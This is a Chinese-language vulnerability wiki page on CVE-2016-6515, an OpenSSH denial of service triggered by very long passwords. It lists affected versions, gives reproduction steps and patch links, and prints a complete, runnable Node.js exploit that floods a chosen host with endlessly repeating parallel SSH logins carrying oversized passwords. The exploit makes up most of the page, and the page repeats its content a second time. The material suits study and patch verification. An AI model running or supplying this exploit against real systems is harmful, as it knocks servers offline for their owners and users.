3.9.1 cve-2016-6515

漏洞名称

OpenSSH auth_password函数拒绝服务漏洞（cve-2016-6515）

漏洞等级

高危

漏洞描述：

Before 7.3 OpenSSH does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string. This bug resides in auth-passwd.c in auth_password function. Attackers can exploit this issue to cause the application to enter an infinite loop and consume excessive CPU resources, resulting in denial-of-service conditions. 大致意思： OpenSSH 7.3之前版本，sshd/auth-passwd.c/auth_password函数未限制密码验证中的密码长度，远程攻击者通过较长的字符串，利用此漏洞可造成拒绝服务。

漏洞影响：

Ubuntu 16.04 LTS (If running 7.2)
OpenSSH OpenSSH 7.2p2
OpenSSH OpenSSH 7.2
IBM Vios 2.2.1 4
IBM Vios 2.2
IBM Vios 2.2.4.0
IBM Vios 2.2.3.50
IBM Vios 2.2.2.5
IBM Vios 2.2.2.0
IBM Vios 2.2.1.3
IBM Vios 2.2.1.1
IBM Vios 2.2.0.13
IBM Vios 2.2.0.11
IBM OpenSSH for GPFS 3.5
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
Openssh < 7.3

漏洞复现：

debian食用方法(不同环境依赖可能不同)：

zhzy@debian:~$  apt-get install
zhzy@debian:~$  npm install ssh2
zhzy@debian:~$  npm install commander
zhzy@debian:~$  ./exploit.js -h HOST -p PORT -u USER

左侧vm为测试对象，右侧terminal为攻击方，下图为执行前，vm中ubuntu的top信息。

执行后可以看到vm中ubuntu的cpu使用率急速提升。

下载链接：cve-2016-6515.zip

#!/usr/bin/env node

/*
 * CVE-2016-6515 exploit by opsxcq
 */

var Client = require('ssh2').Client;
var program = require('commander');

function usage(){
    console.log("[-] Usage: ./exploit.js -h host -p port -u user");
}

var pattern="AAAAAAAAA";
var buffer="";
for(var i=0; i < 10000; i++){
    buffer = buffer + pattern;
}

function exploit(host, port, user){
    var conn = new Client();
    conn//
    .on('end', function() {
        // Again
        exploit(host, port, user); 
    })//
    .on('close', function(err) {
        // Again
        if(!err){
            exploit(host, port, user); 
        }
    })//
    .on('error', function(){
        exploit(host, port, user); 
    }) //
    .connect({
        host: host,
        port: port,
        username: user,
        password: buffer
    });
}

program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseInt)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances',parseInt)
.parse(process.argv);

if (!program.port){
    usage();
    return -1;
}

if (!program.user){
    usage();
    return -1;
}

if (!program.host){
    usage();
    return -1;
}

var instances = 20;
if(program.instances){
    instances = program.instances;
}

try{
    console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
    for(var i=0; i < instances; i++){
        exploit(program.host, program.port, program.user);
    }
}catch(e){
    console.log("[-] Exception: "+e);
}

修复建议：

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://openwall.com/lists/oss-security/2016/08/01/2 https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97 或将openssh升级到v7.3版本以上（查看openssh版本：ssh -V）

Previous3.9 openssh漏洞 Next4.网络漏洞

Last updated 6 years ago

Was this helpful?

漏洞描述：

Before 7.3 OpenSSH does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string. This bug resides in auth-passwd.c in auth_password function. Attackers can exploit this issue to cause the application to enter an infinite loop and consume excessive CPU resources, resulting in denial-of-service conditions. 大致意思： OpenSSH 7.3之前版本，sshd/auth-passwd.c/auth_password函数未限制密码验证中的密码长度，远程攻击者通过较长的字符串，利用此漏洞可造成拒绝服务。

漏洞影响：

Ubuntu 16.04 LTS (If running 7.2)

OpenSSH OpenSSH 7.2p2

OpenSSH OpenSSH 7.2

IBM Vios 2.2.1 4

IBM Vios 2.2

IBM Vios 2.2.4.0

IBM Vios 2.2.3.50

IBM Vios 2.2.2.5

IBM Vios 2.2.2.0

IBM Vios 2.2.1.3

IBM Vios 2.2.1.1

IBM Vios 2.2.0.13

IBM Vios 2.2.0.11

IBM OpenSSH for GPFS 3.5

IBM Aix 7.2

IBM AIX 7.1

IBM AIX 6.1

IBM AIX 5.3

Openssh < 7.3

漏洞复现：

debian食用方法(不同环境依赖可能不同)：

zhzy@debian:~$  apt-get install
zhzy@debian:~$  npm install ssh2
zhzy@debian:~$  npm install commander
zhzy@debian:~$  ./exploit.js -h HOST -p PORT -u USER

左侧vm为测试对象，右侧terminal为攻击方，下图为执行前，vm中ubuntu的top信息。

执行后可以看到vm中ubuntu的cpu使用率急速提升。

#!/usr/bin/env node

/*
 * CVE-2016-6515 exploit by opsxcq
 */

var Client = require('ssh2').Client;
var program = require('commander');

function usage(){
    console.log("[-] Usage: ./exploit.js -h host -p port -u user");
}

var pattern="AAAAAAAAA";
var buffer="";
for(var i=0; i < 10000; i++){
    buffer = buffer + pattern;
}

function exploit(host, port, user){
    var conn = new Client();
    conn//
    .on('end', function() {
        // Again
        exploit(host, port, user); 
    })//
    .on('close', function(err) {
        // Again
        if(!err){
            exploit(host, port, user); 
        }
    })//
    .on('error', function(){
        exploit(host, port, user); 
    }) //
    .connect({
        host: host,
        port: port,
        username: user,
        password: buffer
    });
}

program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseInt)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances',parseInt)
.parse(process.argv);

if (!program.port){
    usage();
    return -1;
}

if (!program.user){
    usage();
    return -1;
}

if (!program.host){
    usage();
    return -1;
}

var instances = 20;
if(program.instances){
    instances = program.instances;
}

try{
    console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
    for(var i=0; i < instances; i++){
        exploit(program.host, program.port, program.user);
    }
}catch(e){
    console.log("[-] Exception: "+e);
}